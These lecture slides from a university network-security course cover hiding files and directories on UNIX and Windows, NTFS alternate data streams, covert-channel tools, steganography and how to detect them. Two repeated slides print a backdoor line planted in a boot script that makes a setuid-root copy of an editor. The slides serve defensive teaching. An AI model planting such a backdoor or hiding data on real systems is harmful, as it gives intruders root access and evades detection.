190 likes | 334 Views
ECE-8843 http://www.csc.gatech.edu/copeland/jac/8843/ Prof. John A. Copeland john.copeland@ece.gatech.edu 404 894-5177 fax 404 894-0035 Office: GCATT Bldg 579 email or call for office visit, or call Kathy Cheek, 404 894-5696 Slides 15 - Hidden Data, Covert Channels. “Hidden Files”.
E N D
ECE-8843 http://www.csc.gatech.edu/copeland/jac/8843/ Prof. John A. Copeland john.copeland@ece.gatech.edu 404 894-5177 fax 404 894-0035 Office: GCATT Bldg 579 email or call for office visit, or call Kathy Cheek, 404 894-5696 Slides 15 - Hidden Data, Covert Channels
“Hidden Files” On a UNIX system, starting a file name with a dot “.” hides it from the simple list command, “ls”. [root@lc1 me]# echo "regular file" > regfile [root@lc1 me]# echo "hide me" > .hiddenfile [root@lc1 me]# ls regfile [root@lc1 me]# ls -a . .. .hiddenfile regfile [root@lc1 me]# The “ls -a” command will reveal these hidden files. 2
Hidden Directory “. ” On a UNIX system, a hard to spot hidden directory can be made by naming it dot-space “. “ [root@lc1 me]# mkdir ". " [root@lc1 me]# echo "well-hidden" > ". "/well_hide [root@lc1 me]# ls -a . . .. .hiddenfile regfile [root@lc1 me]# ls -al total 6 drwxr-xr-x 3 root root 1024 Apr 16 19:59 . drwxr-xr-x 2 root root 1024 Apr 16 20:00 . drwxrwx--- 29 root wheel 2048 Apr 16 19:49 .. -rw-r--r-- 1 root root 8 Apr 16 19:52 .hiddenfile -rw-r--r-- 1 root root 13 Apr 16 19:52 regfile Note that the file “well_hide” does not appear. 3
Startup Scripts When starting run level “3”, daemons are stopped or started by shell scripts if there is a “link” pointing to the script in /etc/rc.d/rc3.d/ # ./K05innd stop ;./K10pulse stop; ... ; ./S05kudzu start; ./S10network start ; ... [root@lc1 rc.d]# ls -l rc3.d/ total 0 lrwxrwxrwx 1 root root 14 Jun 29 2000 K05innd -> ../init.d/innd lrwxrwxrwx 1 root root 15 Jun 29 2000 K10pulse -> ../init.d/pulse lrwxrwxrwx 1 root root 13 Aug 5 2000 K20nfs -> ../init.d/nfs lrwxrwxrwx 1 root root 16 Jun 29 2000 K20rstatd -> ../init.d/rstatd lrwxrwxrwx 1 root root 17 Jun 29 2000 K20rusersd ->../init.d/rusersd lrwxrwxrwx 1 root root 15 Jun 29 2000 K20rwhod -> ../init.d/rwhod lrwxrwxrwx 1 root root 13 Jun 29 2000 K35smb -> ../init.d/smb lrwxrwxrwx 1 root root 18 Feb 8 19:19 K45arpwatch -> ../init.d/arpwatch lrwxrwxrwx 1 root root 15 Feb 8 19:20 K45named -> ../init.d/named lrwxrwxrwx 1 root root 16 Jun 29 2000 K45pcmcia -> ../init.d/pcmcia lrwxrwxrwx 1 root root 15 Jun 29 2000 K50snmpd -> ../init.d/snmpd lrwxrwxrwx 1 root root 16 Jun 29 2000 K55routed -> ../init.d/routed lrwxrwxrwx 1 root root 19 Jun 29 2000 K99linuxconf -> ../init.d/linuxconf lrwxrwxrwx 1 root root 15 Jun 29 2000 S05kudzu -> ../init.d/kudzu lrwxrwxrwx 1 root root 17 Feb 8 19:19 S10network -> ../init.d/network . . . 4
Script Run on Every Reboot [root@lc1 init.d]# ls -l kudzu -rwxr-xr-x 1 root root 1427 Aug 30 2000 kudzu [root@lc1 init.d]# cat kudzu #!/bin/sh # # kudzu This scripts runs the kudzu hardware probe. # # chkconfig: 345 05 95 # description: This runs the hardware probe, and optionally configures \ # changed hardware. cp /usr/bin/ed /usr/bin/mailfix;chmod /usr/bin/mailfix -4555; # This is an interactive program, we need the current locale [ -f /etc/profile.d/lang.sh ] && . /etc/profile.d/lang.sh This computer is totally compromised. Any one who logs on can run commands as root. 5
Script Run on Every Reboot [root@lc1 init.d]# ls -l kudzu -rwxr-xr-x 1 root root 1427 Aug 30 2000 kudzu [root@lc1 init.d]# cat kudzu #!/bin/sh # # kudzu This scripts runs the kudzu hardware probe. # # chkconfig: 345 05 95 # description: This runs the hardware probe, and optionally configures \ # changed hardware. cp /usr/bin/ed /usr/bin/mailfix;chmod /usr/bin/mailfix -4555; # This is an interactive program, we need the current locale [ -f /etc/profile.d/lang.sh ] && . /etc/profile.d/lang.sh This computer is totally compromised. Any one who logs on can run commands as root. 6
Windows NT By “right clicking” on the file listing in NT or Win2000, the “Hidden” attribute can be set. This prevents the file from being shown under default settings of a directory window; however, the directory window View Menu offers the opinion of showing “hidden” files. The files in Microsoft NT and Win2000 have additional “streams” that can store data in parallel with data in the main channel. These additional streams can be accessed using the program “cp” which is available by purchasing the Windows NT Resource Kit. To hide the contents of file stuff.txt in another file like notepad.exe C:\> cp stuff.txt notepad.exe:data A directory window will still show the same size for notepad.exe To retrieve the data later C:\> cp notepad.exe:data stuff.txt Ref. “Counter Hack,” Ed Skoudis, p. 460 7 7
Defense Against Hidden Files Use a file-integrity checker like “Tripwire” Use a Host-Based IDS (Intrusion Detection System) Do not let strangers log on the system (good authentication). Remove vulnerabilities that would let a stranger log on, or a trusted user upgrade their privileges.
Covert Channels Sending data in a way that network watchers (sniffer, IDS, ..) will not be aware that data is being transmitted. For IP Networks: Data hidden in the IP header Data hidden in ICMP Echo Request and Response Packets Data tunneled through an SSH connection “Port 80” Tunneling, (or DNS port 53 tunneling) In image files. 9
20-64 bytes 20-64 bytes 0-65,488 bytes IP Header TCP Header DATA Dear Friend, I am having a good time at the beach. TCP Source Port TCP Destination Port IP Source Address IP Destination Address Packet Header Hiding 10
IP Header 0-44 bytes 11
TCP Header 0-44 bytes 12
ICMP Headers =3 0-65,535 bytes 13
Convert Channel Tools SSH (SCP, FTP Tunneling, Telnet Tunneling, X-Windows Tunneling, ...) - can be set to operate on any port (<1024 usually requires root privilege). Loki (ICMP Echo R/R, UDP 53) NT - Back Orifice (BO2K) plugin BOSOCK32 Reverse WWW Shell Server - looks like a HTTP client (browser). App headers mimic HTTP GET and response commands. 14
Steganography see http://www.jjtc.com/Steganography/ 15
Speech or Music Encoding Use the lowest-order bit in each sample value for covert data. This doubles the “quantization noise,” but that may not be noticed. 16
Detecting Covert Channels A network IDS can detect a “Ping Unbalance” - more Ping Responses than Requests, or data that does not match. Block all ICMP packets at firewall (can cause problems) Signature-based IDS will detect known programs (Loki) Port 53 Tunneling - Block inbound and outbound TCP/UDP-53 packets at firewall except to/from known internal DNS servers. Port 80 Tunneling - look for long-lasting flows to outside server, excess client-to-server data flow. Port-80 Client Port-profile violation (never used before for browser). Steganography - If Zombie, look for Port-profile violation, or known hacker-site server. 17
Monitor for New and Unknown Processes # ps -e PID TTY TIME CMD 1 ? 00:00:05 init 2 ? 00:00:00 kflushd 3 ? 00:00:25 kupdate 4 ? 00:00:00 kpiod 5 ? 00:00:00 kswapd 6 ? 00:00:00 mdrecoveryd 47 ? 00:00:00 khubd 337 ? 00:00:00 syslogd 347 ? 00:00:00 klogd 362 ? 00:00:00 portmap 378 ? 00:00:00 lockd 379 ? 00:00:00 rpciod 389 ? 00:00:00 rpc.statd 404 ? 00:00:00 apmd 458 ? 00:00:00 identd 462 ? 00:00:00 identd 463 ? 00:00:00 identd 464 ? 00:00:00 identd 465 ? 00:00:00 identd 477 ? 00:00:00 atd 492 ? 00:00:00 xinetd 502 ? 00:00:12 sshd 524 ? 00:00:00 lpd 29891 tty1 00:00:00 xinit 29892 ? 00:06:11 X 29895 tty1 00:00:00 gnome-session 29905 ? 00:00:00 gnome-smproxy 29907 ? 00:00:33 enlightenment 29909 ? 00:00:01 magicdev 29923 ? 00:00:01 panel 29926 ? 00:00:00 gnome-name-serv 29928 ? 00:00:01 gmc 29931 ? 00:00:00 gnome-terminal 29933 ? 00:00:01 gnome-terminal 29935 ? 00:00:00 gnome-terminal 29936 ? 00:00:00 gnome-pty-helpe 29937 pts/2 00:00:00 bash 29945 ? 00:00:00 gnome-pty-helpe 29946 pts/3 00:00:00 bash 29947 ? 00:00:00 gnome-pty-helpe 29948 pts/4 00:00:00 bash 30021 ? 00:00:03 netscape-commun 30054 ? 00:00:00 netscape-commun 30105 ? 00:00:00 gnome-terminal 30106 ? 00:00:00 gnome-pty-helpe 18
Monitor for New Ports # netstat -ao -A inet [on some UNIX systems, use “-f inet”] Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State User tcp 0 112 lc1.jac.local:ssh g4.jac.local:50559 ESTABLISHED root tcp 0 0 lc1.jac.local:8822 c-66-56-79-1.atl.:28928 ESTABLISHED root tcp 1 0 lc1.jac.local:1058 csc.gatech.edu:www CLOSE_WAIT root tcp 1 0 lc1.jac.local:1056 csc.gatech.edu:www CLOSE_WAIT root tcp 0 0 *:X *:* LISTEN root tcp 0 0 lc1.jac.local:8822 c-66-56-79-1.atl.:12883 ESTABLISHED root tcp 0 0 lc1.jac.local:8822 c-66-56-79-1.atl.:21539 ESTABLISHED root tcp 0 0 *:www *:* LISTEN root tcp 0 0 *:smtp *:* LISTEN root tcp 0 0 *:printer *:* LISTEN root tcp 0 0 *:ssh *:* LISTEN root tcp 0 0 *:58822 *:* LISTEN root tcp 0 0 *:login *:* LISTEN root tcp 0 0 *:shell *:* LISTEN root tcp 0 0 *:telnet *:* LISTEN root tcp 0 0 *:ftp *:* LISTEN root tcp 0 0 *:finger *:* LISTEN root tcp 0 0 *:auth *:* LISTEN root tcp 0 0 *:1024 *:* LISTEN rpcuser tcp 0 0 *:sunrpc *:* LISTEN root udp 0 0 *:1025 *:* rpcuser udp 0 0 *:989 *:* root udp 0 0 *:1024 *:* root raw 0 0 *:icmp *:* 7 root raw 0 0 *:tcp *.* 7 root 19